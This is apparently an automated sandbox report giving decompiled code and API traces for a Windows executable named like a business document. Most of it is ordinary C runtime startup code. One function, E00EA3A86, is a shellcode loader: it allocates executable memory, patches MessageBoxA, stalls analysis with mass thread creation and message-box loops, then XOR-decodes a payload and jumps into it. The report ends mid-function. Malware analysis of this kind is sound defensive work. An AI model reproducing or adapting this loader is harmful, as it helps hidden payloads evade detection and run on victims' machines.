10440->10442 10441 ea44ff 
__RTC_Initialize 10450 ea455c 10441->10450 10465 ea428b 10441->10465 10444 ea4518 10444->10450 10468 ea4c7c InitializeSListHead 10444->10468 10446 ea452e 10469 ea4c8b 10446->10469 10448 ea4551 10475 ea8891 10448->10475 10450->10440 10451 ea4579 10450->10451 10453 ea87c3 10452->10453 10454 ea87e6 10452->10454 10453->10454 10455 ea75d4 _free 14 API calls 10453->10455 10454->10438 10456 ea87d6 10455->10456 10457 ea748c __CreateFrameInfo 25 API calls 10456->10457 10458 ea87e1 10457->10458 10458->10438 10460 ea410a 10459->10460 10461 ea410e 10459->10461 10460->10441 10462 ea4959 4 API calls 10461->10462 10464 ea411b ___scrt_release_startup_lock 10461->10464 10463 ea4184 10462->10463 10464->10441 10482 ea425e 10465->10482 10468->10446 10545 ea89c7 10469->10545 10471 ea4c9c 10472 ea4ca3 10471->10472 10473 ea4959 4 API calls 10471->10473 10472->10448 10474 ea4cab 10473->10474 10476 ea90a4 _unexpected 37 API calls 10475->10476 10478 ea889c 10476->10478 10477 ea88d4 10477->10450 10478->10477 10479 ea75d4 _free 14 API calls 10478->10479 10480 ea88c9 10479->10480 10481 ea748c __CreateFrameInfo 25 API calls 10480->10481 10481->10477 10483 ea426d 10482->10483 10484 ea4274 10482->10484 10488 ea848f 10483->10488 10491 ea84fb 10484->10491 10487 ea4272 10487->10444 10489 ea84fb 28 API calls 10488->10489 10490 ea84a1 10489->10490 10490->10487 10494 ea8231 10491->10494 10495 ea823d ___scrt_is_nonwritable_in_current_image 10494->10495 10502 ea9d97 EnterCriticalSection 10495->10502 10497 ea824b 10503 ea828c 10497->10503 10499 ea8258 10513 ea8280 10499->10513 10502->10497 10504 ea82a8 10503->10504 10506 ea831f _free 10503->10506 10505 ea82ff 10504->10505 10504->10506 10516 ea7273 10504->10516 10505->10506 10508 ea7273 28 API calls 10505->10508 10506->10499 10510 ea8315 10508->10510 10509 ea82f5 10511 ea8b82 _free 14 API calls 10509->10511 10512 ea8b82 _free 14 API calls 10510->10512 10511->10505 10512->10506 10544 ea9ddf LeaveCriticalSection 10513->10544 10515 ea8269 10515->10487 10517 
ea729b 10516->10517 10518 ea7280 10516->10518 10520 ea72aa 10517->10520 10525 ea9b14 10517->10525 10518->10517 10519 ea728c 10518->10519 10521 ea75d4 _free 14 API calls 10519->10521 10532 ea9b47 10520->10532 10524 ea7291 __CreateFrameInfo 10521->10524 10524->10509 10526 ea9b1f 10525->10526 10527 ea9b34 HeapSize 10525->10527 10528 ea75d4 _free 14 API calls 10526->10528 10527->10520 10529 ea9b24 10528->10529 10530 ea748c __CreateFrameInfo 25 API calls 10529->10530 10531 ea9b2f 10530->10531 10531->10520 10533 ea9b5f 10532->10533 10534 ea9b54 10532->10534 10536 ea9b67 10533->10536 10543 ea9b70 _free 10533->10543 10535 ea8bbc 15 API calls 10534->10535 10541 ea9b5c 10535->10541 10539 ea8b82 _free 14 API calls 10536->10539 10537 ea9b9a HeapReAlloc 10537->10541 10537->10543 10538 ea9b75 10540 ea75d4 _free 14 API calls 10538->10540 10539->10541 10540->10541 10541->10524 10542 ea893e _free 2 API calls 10542->10543 10543->10537 10543->10538 10543->10542 10544->10515 10546 ea8a05 10545->10546 10547 ea89e5 10545->10547 10546->10471 10548 ea75d4 _free 14 API calls 10547->10548 10549 ea89fb 10548->10549 10550 ea748c __CreateFrameInfo 25 API calls 10549->10550 10550->10546 11310 ea943f 11311 eab8fc ___scrt_uninitialize_crt 66 API calls 11310->11311 11312 ea9447 11311->11312 11320 eac914 11312->11320 11314 ea944c 11330 eac9bf 11314->11330 11317 ea9476 11318 ea8b82 _free 14 API calls 11317->11318 11319 ea9481 11318->11319 11321 eac920 ___scrt_is_nonwritable_in_current_image 11320->11321 11334 ea9d97 EnterCriticalSection 11321->11334 11323 eac997 11348 eac9b6 11323->11348 11324 eac92b 11324->11323 11326 eac96b DeleteCriticalSection 11324->11326 11335 eae56b 11324->11335 11329 ea8b82 _free 14 API calls 11326->11329 11329->11324 11331 ea945b DeleteCriticalSection 11330->11331 11332 eac9d6 11330->11332 11331->11314 11331->11317 11332->11331 11333 ea8b82 _free 14 API calls 11332->11333 11333->11331 11334->11324 11336 eae577 ___scrt_is_nonwritable_in_current_image 11335->11336 11337 
eae581 11336->11337 11338 eae596 11336->11338 11339 ea75d4 _free 14 API calls 11337->11339 11344 eae591 11338->11344 11351 ea948b EnterCriticalSection 11338->11351 11341 eae586 11339->11341 11342 ea748c __CreateFrameInfo 25 API calls 11341->11342 11342->11344 11343 eae5b3 11352 eae4f4 11343->11352 11344->11324 11346 eae5be 11368 eae5e5 11346->11368 11427 ea9ddf LeaveCriticalSection 11348->11427 11350 eac9a3 11350->11314 11351->11343 11353 eae501 11352->11353 11354 eae516 11352->11354 11355 ea75d4 _free 14 API calls 11353->11355 11356 eab84f ___scrt_uninitialize_crt 62 API calls 11354->11356 11360 eae511 11354->11360 11357 eae506 11355->11357 11358 eae52b 11356->11358 11359 ea748c __CreateFrameInfo 25 API calls 11357->11359 11361 eac9bf 14 API calls 11358->11361 11359->11360 11360->11346 11362 eae533 11361->11362 11363 ea9350 ___scrt_uninitialize_crt 25 API calls 11362->11363 11364 eae539 11363->11364 11371 eaf268 11364->11371 11367 ea8b82 _free 14 API calls 11367->11360 11426 ea949f LeaveCriticalSection 11368->11426 11370 eae5ed 11370->11344 11372 eaf279 11371->11372 11373 eaf28e 11371->11373 11375 ea75c1 __dosmaperr 14 API calls 11372->11375 11374 eaf2d7 11373->11374 11378 eaf2b5 11373->11378 11376 ea75c1 __dosmaperr 14 API calls 11374->11376 11377 eaf27e 11375->11377 11379 eaf2dc 11376->11379 11380 ea75d4 _free 14 API calls 11377->11380 11386 eaf1dc 11378->11386 11382 ea75d4 _free 14 API calls 11379->11382 11383 eae53f 11380->11383 11384 eaf2e4 11382->11384 11383->11360 11383->11367 11385 ea748c __CreateFrameInfo 25 API calls 11384->11385 11385->11383 11387 eaf1e8 ___scrt_is_nonwritable_in_current_image 11386->11387 11397 eaba53 EnterCriticalSection 11387->11397 11389 eaf1f6 11390 eaf228 11389->11390 11391 eaf21d 11389->11391 11393 ea75d4 _free 14 API calls 11390->11393 11398 eaf2f5 11391->11398 11394 eaf223 11393->11394 11413 eaf25c 11394->11413 11397->11389 11399 eabb2a ___scrt_uninitialize_crt 25 API calls 11398->11399 11401 eaf305 11399->11401 11400 eaf30b 
11416 eaba99 11400->11416 11401->11400 11403 eabb2a ___scrt_uninitialize_crt 25 API calls 11401->11403 11412 eaf33d 11401->11412 11406 eaf334 11403->11406 11404 eabb2a ___scrt_uninitialize_crt 25 API calls 11407 eaf349 CloseHandle 11404->11407 11409 eabb2a ___scrt_uninitialize_crt 25 API calls 11406->11409 11407->11400 11410 eaf355 GetLastError 11407->11410 11408 eaf385 11408->11394 11409->11412 11410->11400 11411 ea759e __dosmaperr 14 API calls 11411->11408 11412->11400 11412->11404 11425 eaba76 LeaveCriticalSection 11413->11425 11415 eaf245 11415->11383 11417 eabaa8 11416->11417 11418 eabb0f 11416->11418 11417->11418 11424 eabad2 11417->11424 11419 ea75d4 _free 14 API calls 11418->11419 11420 eabb14 11419->11420 11421 ea75c1 __dosmaperr 14 API calls 11420->11421 11422 eabaff 11421->11422 11422->11408 11422->11411 11423 eabaf9 SetStdHandle 11423->11422 11424->11422 11424->11423 11425->11415 11426->11370 11427->11350 9274 ea458a 9279 ea4aef SetUnhandledExceptionFilter 9274->9279 9276 ea458f 9280 ea88fa 9276->9280 9278 ea459a 9279->9276 9281 ea8920 9280->9281 9282 ea8906 9280->9282 9281->9278 9282->9281 9283 ea75d4 _free 14 API calls 9282->9283 9284 ea8910 9283->9284 9285 ea748c __CreateFrameInfo 25 API calls 9284->9285 9286 ea891b 9285->9286 9286->9278 9287 ea459c 9288 ea45a8 ___scrt_is_nonwritable_in_current_image 9287->9288 9315 ea40c5 9288->9315 9290 ea45af 9291 ea4702 9290->9291 9294 ea45d9 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 9290->9294 9357 ea4959 IsProcessorFeaturePresent 9291->9357 9293 ea4709 9361 ea7ccf 9293->9361 9299 ea45f8 9294->9299 9300 ea4679 9294->9300 9337 ea7ca9 9294->9337 9297 ea7c93 __CreateFrameInfo 23 API calls 9298 ea4717 9297->9298 9323 ea4a74 9300->9323 9316 ea40ce 9315->9316 9364 ea4775 IsProcessorFeaturePresent 9316->9364 9320 ea40df 9321 ea40e3 9320->9321 9374 ea5c6f 9320->9374 9321->9290 9436 ea5210 9323->9436 9326 ea467f 9327 ea86ee 9326->9327 9328 eaad73 47 API calls 9327->9328 9330 
ea86f7 9328->9330 9329 ea4687 9332 ea3bdd GetCommandLineA 9329->9332 9330->9329 9438 eab099 9330->9438 9444 ea3a86 VirtualAlloc VirtualProtect 9332->9444 9338 ea7cbf _free 9337->9338 9339 ea783d ___scrt_is_nonwritable_in_current_image 9337->9339 9338->9300 9340 ea90a4 _unexpected 37 API calls 9339->9340 9344 ea784e 9340->9344 9341 ea8a26 CallUnexpected 37 API calls 9342 ea7878 9341->9342 9343 ea91fb _free 14 API calls 9342->9343 9345 ea7887 9343->9345 9344->9341 9345->9300 9358 ea496f __CreateFrameInfo 9357->9358 9359 ea4a1a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9358->9359 9360 ea4a65 __CreateFrameInfo 9359->9360 9360->9293 9362 ea7b2a __CreateFrameInfo 23 API calls 9361->9362 9363 ea470f 9362->9363 9363->9297 9365 ea40da 9364->9365 9366 ea5c50 9365->9366 9380 ea6dd7 9366->9380 9369 ea5c59 9369->9320 9371 ea5c61 9372 ea5c6c 9371->9372 9394 ea6e13 9371->9394 9372->9320 9375 ea5c78 9374->9375 9376 ea5c82 9374->9376 9377 ea5e9f ___vcrt_uninitialize_ptd 6 API calls 9375->9377 9376->9321 9378 ea5c7d 9377->9378 9379 ea6e13 ___vcrt_uninitialize_locks DeleteCriticalSection 9378->9379 9379->9376 9382 ea6de0 9380->9382 9383 ea6e09 9382->9383 9384 ea5c55 9382->9384 9398 ea7016 9382->9398 9385 ea6e13 ___vcrt_uninitialize_locks DeleteCriticalSection 9383->9385 9384->9369 9386 ea5e6c 9384->9386 9385->9384 9417 ea6f27 9386->9417 9391 ea5e9c 9391->9371 9393 ea5e81 9393->9371 9395 ea6e3d 9394->9395 9396 ea6e1e 9394->9396 9395->9369 9397 ea6e28 DeleteCriticalSection 9396->9397 9397->9395 9397->9397 9403 ea6edd 9398->9403 9401 ea704e InitializeCriticalSectionAndSpinCount 9402 ea7039 9401->9402 9402->9382 9404 ea6f19 9403->9404 9405 ea6ef6 9403->9405 9404->9401 9404->9402 9405->9404 9409 ea6e42 9405->9409 9408 ea6f0b GetProcAddress 9408->9404 9414 ea6e4e ___vcrt_FlsSetValue 9409->9414 9410 ea6ec3 9410->9404 9410->9408 9411 ea6e65 LoadLibraryExW 9412 ea6eca 9411->9412 9413 ea6e83 GetLastError 9411->9413 9412->9410 9415 ea6ed2 FreeLibrary 9412->9415 
9413->9414 9414->9410 9414->9411 9416 ea6ea5 LoadLibraryExW 9414->9416 9415->9410 9416->9412 9416->9414 9418 ea6edd ___vcrt_FlsSetValue 5 API calls 9417->9418 9419 ea6f41 9418->9419 9420 ea6f5a TlsAlloc 9419->9420 9421 ea5e76 9419->9421 9421->9393 9422 ea6fd8 9421->9422 9423 ea6edd ___vcrt_FlsSetValue 5 API calls 9422->9423 9424 ea6ff2 9423->9424 9425 ea700d TlsSetValue 9424->9425 9426 ea5e8f 9424->9426 9425->9426 9426->9391 9427 ea5e9f 9426->9427 9428 ea5ea9 9427->9428 9429 ea5eaf 9427->9429 9431 ea6f62 9428->9431 9429->9393 9432 ea6edd ___vcrt_FlsSetValue 5 API calls 9431->9432 9433 ea6f7c 9432->9433 9434 ea6f94 TlsFree 9433->9434 9435 ea6f88 9433->9435 9434->9435 9435->9429 9437 ea4a87 GetStartupInfoW 9436->9437 9437->9326 9441 eab042 9438->9441 9442 ea70e3 __fassign 37 API calls 9441->9442 9443 eab056 9442->9443 9443->9330 9445 ea3b3c CreateThread 9444->9445 9446 ea3b50 9445->9446 9446->9445 9447 ea3b6a 9446->9447 9448 ea3b74 MessageBoxA 9447->9448 9449 ea3b8e 9447->9449 9448->9447 9448->9448 9450 ea3b93 MessageBoxA 9449->9450 9450->9450 9451 ea3bb7 9450->9451 9452 ea3bd0 Sleep 9451->9452 9452->9452 9629 ea961d 9630 ea9629 ___scrt_is_nonwritable_in_current_image 9629->9630 9641 ea9d97 EnterCriticalSection 9630->9641 9632 ea9630 9642 eab9b5 9632->9642 9640 ea964e 9666 ea9674 9640->9666 9641->9632 9643 eab9c1 ___scrt_is_nonwritable_in_current_image 9642->9643 9644 eab9ca 9643->9644 9645 eab9eb 9643->9645 9647 ea75d4 _free 14 API calls 9644->9647 9669 ea9d97 EnterCriticalSection 9645->9669 9649 eab9cf 9647->9649 9648 eab9f7 9651 eaba23 9648->9651 9670 eab905 9648->9670 9650 ea748c __CreateFrameInfo 25 API calls 9649->9650 9652 ea963f 9650->9652 9677 eaba4a 9651->9677 9652->9640 9655 ea94b3 GetStartupInfoW 9652->9655 9656 ea94d0 9655->9656 9658 ea9564 9655->9658 9657 eab9b5 26 API calls 9656->9657 9656->9658 9659 ea94f8 9657->9659 9661 ea9569 9658->9661 9659->9658 9660 ea9528 GetFileType 9659->9660 9660->9659 9662 ea9570 9661->9662 9663 ea95b3 GetStdHandle 
9662->9663 9664 ea9619 9662->9664 9665 ea95c6 GetFileType 9662->9665 9663->9662 9664->9640 9665->9662 9686 ea9ddf LeaveCriticalSection 9666->9686 9668 ea965f 9669->9648 9671 ea9e27 _free 14 API calls 9670->9671 9672 eab917 9671->9672 9676 eab924 9672->9676 9680 ea999f 9672->9680 9673 ea8b82 _free 14 API calls 9675 eab979 9673->9675 9675->9648 9676->9673 9685 ea9ddf LeaveCriticalSection 9677->9685 9679 eaba51 9679->9652 9681 ea97be _free 5 API calls 9680->9681 9682 ea99bb 9681->9682 9683 ea99d9 InitializeCriticalSectionAndSpinCount 9682->9683 9684 ea99c4 9682->9684 9683->9684 9684->9672 9685->9679 9686->9668

    Control-flow Graph

    control_flow_graph 65 ea4aef-ea4afa SetUnhandledExceptionFilter
    C-Code - Quality: 100%
    			E00EA4AEF() {
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E00EA4AFB); // executed
    				return _t1;
    			}





    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_00004AFB,00EA458F), ref: 00EA4AF4
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: 265b84959c614e627e04da1aaab345022978ad1c977b8763b5bd62d6198eb7f1
    • Instruction ID: 82d9a2561b9c19abf66f05da43f51f6585186b8d09a5eabfe4c7a1c35e33dbfd
    • Opcode Fuzzy Hash: 265b84959c614e627e04da1aaab345022978ad1c977b8763b5bd62d6198eb7f1
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 51%
    			E00EA3A86() {
    				signed int _v8;
    				intOrPtr _v12;
    				char _v109;
    				char _v110;
    				char _v111;
    				char _v112;
    				struct _SECURITY_ATTRIBUTES* _v116;
    				void* _v120;
    				long _v124;
    				signed int _t36;
    				void* _t38;
    				signed int _t60;
    				void* _t61;
    				CHAR* _t62;
    				signed int _t64;
    				void* _t65;
    				signed int* _t69;
    				signed int _t70;
    				_Unknown_base(*)()* _t72;
    				signed int _t73;
    
    				_t36 =  *0xeb9008; // 0x64e1d101
    				_v8 = _t36 ^ _t73;
    				asm("movaps xmm0, [0xeb62b0]");
    				asm("movups [ebp-0x68], xmm0");
    				asm("movaps xmm0, [0xeb6270]");
    				asm("movups [ebp-0x58], xmm0");
    				asm("movaps xmm0, [0xeb6280]");
    				asm("movups [ebp-0x48], xmm0");
    				asm("movaps xmm0, [0xeb62a0]");
    				asm("movups [ebp-0x38], xmm0");
    				asm("movaps xmm0, [0xeb6290]");
    				asm("movups [ebp-0x28], xmm0");
    				asm("movaps xmm0, [0xeb6260]");
    				asm("movups [ebp-0x18], xmm0");
    				_v12 = 0x9d580485;
    				_t38 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
    				_t72 = MessageBoxA;
    				_v124 = _v124 & 0x00000000;
    				_v120 = _t38;
    				VirtualProtect(MessageBoxA, 0x100, 0x40,  &_v124); // executed
    				_t69 = 0xfb387c;
    				_v109 =  *MessageBoxA;
    				_v110 =  *((intOrPtr*)(1));
    				_v111 =  *((intOrPtr*)(2));
    				_v112 =  *((intOrPtr*)(3));
    				 *MessageBoxA = 0x900010c2;
    				_v116 = 0;
    				do {
    					_t60 =  !( *_t69); // executed
    					CreateThread(0, 0, _t72, 0, 0, 0); // executed
    					if(_t60 != 0) {
    						 *(_v116 + _v120) = _t60;
    					}
    					_v116 = _v116 + 1;
    					_t69 = _t69 - 4;
    					_push(0);
    					_pop(0);
    				} while (_t69 >= 0xeb9880);
    				_t61 = 0xea920;
    				do {
    					_t70 = 0x400;
    					do {
    						MessageBoxA(0, "rick", "rick", 2);
    						_t70 = _t70 - 1;
    					} while (_t70 != 0);
    					_t61 = _t61 - 1;
    				} while (_t61 != 0);
    				_t62 = "rick";
    				do {
    					MessageBoxA(0, _t62, _t62, 1);
    					_t64 = 0x64;
    					_t65 = _v120;
    					 *(_t65 + _t70) =  *(_t65 + _t70) ^  *(_t73 + _t70 % _t64 - 0x68);
    					_t70 = _t70 + 1;
    				} while (_t70 < 0x3e800);
    				 *_t72 = _v109;
    				 *((char*)(_t72 + 1)) = _v110;
    				 *((char*)(_t72 + 2)) = _v111;
    				 *((char*)(_t72 + 3)) = _v112;
    				 *_t65();
    				L11:
    				Sleep(0x1388);
    				goto L11;
    			}
























    APIs
    • VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00EA3AF0
    • VirtualProtect.KERNELBASE(75C17E90,00000100,00000040,00000000), ref: 00EA3B0F
    • CreateThread.KERNELBASE(00000000,00000000,75C17E90,00000000,00000000,00000000), ref: 00EA3B46
    • MessageBoxA.USER32 ref: 00EA3B82
    • MessageBoxA.USER32 ref: 00EA3B99
    • Sleep.KERNEL32(00001388), ref: 00EA3BD5
    Similarity
    • API ID: MessageVirtual$AllocCreateProtectSleepThread
    • String ID: rick
    • API String ID: 1205271519-868534032
    • Opcode ID: 0d601432bc0741b8b4a15b4d5a7f35d6901489796e1f049ddb6cd7b2092e54c8
    • Instruction ID: cf0f0c9aaacd3e743bdd68fe1495be55effaa372a9742c217e5eab4dfba2e890
    • Opcode Fuzzy Hash: 0d601432bc0741b8b4a15b4d5a7f35d6901489796e1f049ddb6cd7b2092e54c8
    • Instruction Fuzzy Hash: CF41DA25E043C89EE7118FB98C417FEBFB5AF1A300F146259FAC87B263D6606985C760
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E00EA7FEA(void* __eax, void* __ebx, void* __ecx, void* __edx) {
    
    				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
    			}




    APIs
      • Part of subcall function 00EAB234: GetEnvironmentStringsW.KERNEL32 ref: 00EAB23D
      • Part of subcall function 00EAB234: _free.LIBCMT ref: 00EAB29C
      • Part of subcall function 00EAB234: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EAB2AB
    • _free.LIBCMT ref: 00EA802A
    • _free.LIBCMT ref: 00EA8031
    Similarity
    • API ID: _free$EnvironmentStrings$Free
    • String ID:
    • API String ID: 2490078468-0
    • Opcode ID: b38908dd22eec24a26720ebacc34f396de7b52b0b783eefd7c9d43396a8a45b4
    • Instruction ID: 86923475de655e90e0f0d6195b607127a1513c8dbb11193c8c0c65cf4cb9cc5f
    • Opcode Fuzzy Hash: b38908dd22eec24a26720ebacc34f396de7b52b0b783eefd7c9d43396a8a45b4
    • Instruction Fuzzy Hash: 0EE02B2790691445F365273E7E81A6E13864BAB379F163316E420FE1D3EFA0F80A2165
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    control_flow_graph 29 eab905-eab912 call ea9e27 31 eab917-eab922 29->31 32 eab928-eab930 31->32 33 eab924-eab926 31->33 34 eab973-eab97f call ea8b82 32->34 35 eab932-eab936 32->35 33->34 36 eab938-eab96d call ea999f 35->36 41 eab96f-eab972 36->41 41->34
    C-Code - Quality: 95%
    			E00EAB905(void* __edi, void* __eflags) {
    				intOrPtr _v12;
    				char _t17;
    				void* _t18;
    				intOrPtr* _t32;
    				char _t35;
    				void* _t37;
    
    				_push(_t27);
    				_t17 = E00EA9E27(0x40, 0x38); // executed
    				_t35 = _t17;
    				_v12 = _t35;
    				if(_t35 != 0) {
    					_t2 = _t35 + 0xe00; // 0xe00
    					_t18 = _t2;
    					__eflags = _t35 - _t18;
    					if(__eflags != 0) {
    						_t3 = _t35 + 0x20; // 0x20
    						_t32 = _t3;
    						_t37 = _t18;
    						do {
    							_t4 = _t32 - 0x20; // 0x0
    							E00EA999F(__eflags, _t4, 0xfa0, 0);
    							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
    							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
    							 *_t32 = 0;
    							_t32 = _t32 + 0x38;
    							 *((intOrPtr*)(_t32 - 0x34)) = 0;
    							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
    							 *((char*)(_t32 - 0x2c)) = 0xa;
    							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
    							 *((char*)(_t32 - 0x26)) = 0;
    							__eflags = _t32 - 0x20 - _t37;
    						} while (__eflags != 0);
    						_t35 = _v12;
    					}
    				} else {
    					_t35 = 0;
    				}
    				E00EA8B82(0);
    				return _t35;
    			}

    APIs
      • Part of subcall function 00EA9E27: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EA9246,00000001,00000364,00000006,000000FF,?,?,?,00EA75D9,00EA116B), ref: 00EA9E68
    • _free.LIBCMT ref: 00EAB974
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: dd3c5049decbaab8099cea803f0019154aa2000e803dd7771dc2aca6a42e3996
    • Instruction ID: bb5631ddc665e7be0d421a9e3aada99dac478e76792917fd73d453054a9754ac
    • Opcode Fuzzy Hash: dd3c5049decbaab8099cea803f0019154aa2000e803dd7771dc2aca6a42e3996
    • Instruction Fuzzy Hash: C3012672604316ABC3208F68D88199EFBD8FB4A3B0F145629E645BB6C1D3707C11C7A4
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 42 ea9e27-ea9e32 43 ea9e40-ea9e46 42->43 44 ea9e34-ea9e3e 42->44 46 ea9e48-ea9e49 43->46 47 ea9e5f-ea9e70 RtlAllocateHeap 43->47 44->43 45 ea9e74-ea9e7f call ea75d4 44->45 51 ea9e81-ea9e83 45->51 46->47 48 ea9e4b-ea9e52 call ea88f3 47->48 49 ea9e72 47->49 48->45 55 ea9e54-ea9e5d call ea893e 48->55 49->51 55->45 55->47
    C-Code - Quality: 100%
    			E00EA9E27(signed int _a4, signed int _a8) {
    				void* _t8;
    				signed int _t13;
    				signed int _t18;
    				long _t19;
    
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0xfe2dc0, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E00EA88F3();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E00EA75D4(__eflags))) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						__eflags = E00EA893E(__eflags, _t19);
    						if(__eflags == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EA9246,00000001,00000364,00000006,000000FF,?,?,?,00EA75D9,00EA116B), ref: 00EA9E68
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 48b8f9f513486b128710322dc2cf799c0d01df7af652a2d8859b5b7fbf5ef1eb
    • Instruction ID: 9458951f0d2c5e44b9e8b8bfd8d38aff5a444e5127614bcffa7f4f09cc95a412
    • Opcode Fuzzy Hash: 48b8f9f513486b128710322dc2cf799c0d01df7af652a2d8859b5b7fbf5ef1eb
    • Instruction Fuzzy Hash: BFF0543160412466DB25EB6A9D05B9B77C9AF8B764B14E111AC05FE193DF20FC0196E1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 58 ea3bdd-ea3be3 GetCommandLineA call ea3a86 60 ea3be8-ea3bee 58->60 61 ea3d14-ea3d1c call ea7188 60->61 62 ea3bf4 60->62 62->61
    C-Code - Quality: 84%
    			E00EA3BDD(intOrPtr* __ecx) {
    				void* _t3;
    				intOrPtr* _t5;
    
    				_t5 = __ecx;
    				GetCommandLineA(); // executed
    				E00EA3A86(); // executed
    				asm("int3");
    				_t3 = _t5 + 4;
    				if( *_t5 != _t3) {
    					return E00EA7188( *_t5);
    				} else {
    					return _t3;
    				}
    			}

    APIs
    • GetCommandLineA.KERNEL32 ref: 00EA3BDD
      • Part of subcall function 00EA3A86: VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00EA3AF0
      • Part of subcall function 00EA3A86: VirtualProtect.KERNELBASE(75C17E90,00000100,00000040,00000000), ref: 00EA3B0F
      • Part of subcall function 00EA3A86: CreateThread.KERNELBASE(00000000,00000000,75C17E90,00000000,00000000,00000000), ref: 00EA3B46
      • Part of subcall function 00EA3A86: MessageBoxA.USER32 ref: 00EA3B82
      • Part of subcall function 00EA3A86: MessageBoxA.USER32 ref: 00EA3B99
    Similarity
    • API ID: MessageVirtual$AllocCommandCreateLineProtectThread
    • String ID:
    • API String ID: 1227410803-0
    • Opcode ID: fda250ffe43106f0e3b26846f2d944362792a9648e08d143f6e7c5e8aef4f8c4
    • Instruction ID: 447f937fbdfa3e7ee3d1d71274d9294e2d9b43368acbdc96dcf90a4cd3b1f020
    • Opcode Fuzzy Hash: fda250ffe43106f0e3b26846f2d944362792a9648e08d143f6e7c5e8aef4f8c4
    • Instruction Fuzzy Hash: 4AC04C74015004DBCB056B34D8054547BF6BF5735A7F051EDF1566D832DB326A56DE10
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00EA1B39(void* __ebx, intOrPtr __ecx, struct HINSTANCE__* __edi, void* __esi, void* __eflags) {
    				CHAR* _t55;
    				void* _t63;
    				intOrPtr _t64;
    				CHAR* _t65;
    				struct HRSRC__* _t67;
    				struct HINSTANCE__* _t68;
    				void* _t69;
    				CHAR* _t75;
    				struct HINSTANCE__* _t83;
    				void* _t89;
    				struct HINSTANCE__* _t111;
    				void* _t112;
    				void* _t113;
    				intOrPtr _t115;
    
    				_t109 = __edi;
    				_push(0x428);
    				E00EB0282(0xeb083d, __ebx, __edi, __esi);
    				_t89 = 0;
    				_t55 =  *(_t112 + 8);
    				_t111 = 0;
    				 *(_t112 - 0x42c) =  *(_t112 + 0xc);
    				 *(_t112 - 0x41c) = _t55;
    				 *(_t112 - 0x428) =  *(_t112 + 0x10);
    				 *(_t112 - 0x424) = 0;
    				 *((intOrPtr*)(_t112 - 4)) = 0;
    				 *((intOrPtr*)(_t112 - 0x430)) = __ecx;
    				 *((intOrPtr*)(_t112 - 0x434)) = 0;
    				 *(_t112 - 0x418) = 0;
    				 *((char*)(_t112 - 4)) = 1;
    				if(_t55 == 0) {
    					L30:
    					__eflags = _t89 - _t112 - 0x414;
    					if(_t89 != _t112 - 0x414) {
    						E00EA3D14(_t112 - 0x418);
    					}
    					__eflags = _t111;
    					if(_t111 != 0) {
    						do {
    							_t109 = _t111->i;
    							_t111 = _t109;
    							E00EA7188(_t111);
    							__eflags = _t109;
    						} while (_t109 != 0);
    					}
    				} else {
    					 *(_t112 - 0x420) = E00EA75E7(_t55) + 1;
    					_t63 = E00EA1181(_t112 - 0x420, E00EA75E7(_t55) + 1);
    					_t115 = _t113 + 4;
    					if(_t63 < 0) {
    						L29:
    						_t89 =  *(_t112 - 0x418);
    						goto L30;
    					} else {
    						_t109 =  *(_t112 - 0x420);
    						_t120 = _t109 - 0x400;
    						if(_t109 > 0x400 || E00EA11AE(0, _t109, _t109, 0, _t120) == 0) {
    							_t64 = E00EA3CD7(_t112 - 0x424, _t111, _t109);
